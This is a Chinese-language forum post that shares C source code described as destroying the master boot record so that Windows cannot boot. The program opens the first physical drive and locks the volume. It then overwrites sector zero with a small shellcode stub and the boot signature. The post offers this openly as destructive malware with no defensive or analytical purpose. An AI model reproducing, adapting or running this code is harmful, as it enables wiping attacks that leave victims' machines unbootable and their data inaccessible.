看流星社区

 找回密码
 注册账号
查看: 1833|回复: 0

破坏MBR的代码

[复制链接]

该用户从未签到

发表于 2017-6-2 13:28:27 | 显示全部楼层 |阅读模式
破坏MBR的代码,只有破坏作用,使系统无法进入。。。
来源于网上。。




#include <Windows.h>
#include <stdio.h>

//shellcode随便写了点 能破坏MBR,无法进入系统
unsigned char        scode[]=
        "\xb8\x12\x00"
        "\xcd\x10\xbd"
        "\x18\x7c\xb9";

DWORD writeMBR()
{
        DWORD dwBytesReturned;
        BYTE pMBR[512]={0};

        //将破坏代码写入变量pMBR
        memcpy(pMBR, scode, sizeof(scode));
        pMBR[510]=0x55;
        pMBR[511]=0xaa;

        //打开物理磁盘
        HANDLE hDevice = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
        if (hDevice == INVALID_HANDLE_VALUE)
        {
                printf("createfile failed...");
                return -1;
        }

        //锁定卷,使用FSCTL_LOCK_VOLUME时,以下有几个参数设为NULL,0;
        /*Parameters
        hDevice
        A handle to the volume to be locked. To retrieve a device handle, call the CreateFile function.

        dwIoControlCode
        The control code for the operation. Use FSCTL_LOCK_VOLUME for this operation.

        lpInBuffer
        Not used with this operation; set to NULL.

        nInBufferSize
        Not used with this operation; set to zero.

        lpOutBuffer
        Not used with this operation; set to NULL.

        nOutBufferSize
        Not used with this operation; set to zero.

        lpBytesReturned
        A pointer to a variable that receives the size of the data stored in the output buffer, in bytes. */


        DeviceIoControl(hDevice, FSCTL_LOCK_VOLUME, NULL, 0, NULL, 0, &amp;dwBytesReturned, NULL);
        //写入磁盘文件
        WriteFile(hDevice, pMBR, 512, &amp;dwBytesReturned, NULL);
        DeviceIoControl(hDevice, FSCTL_UNLOCK_VOLUME, NULL, 0, NULL, 0, &amp;dwBytesReturned, NULL);
        return 0;
}

int main(int argc, char* argv[])
{
        writeMBR();
        return 0;
}
点击按钮快速添加回复内容: 支持 高兴 激动 给力 加油 苦寻 生气 回帖 路过 感恩
您需要登录后才可以回帖 登录 | 注册账号

本版积分规则

小黑屋|手机版|Archiver|看流星社区 |网站地图

GMT+8, 2024-3-19 18:45

Powered by Kanliuxing X3.4

© 2010-2019 kanliuxing.com

快速回复 返回顶部 返回列表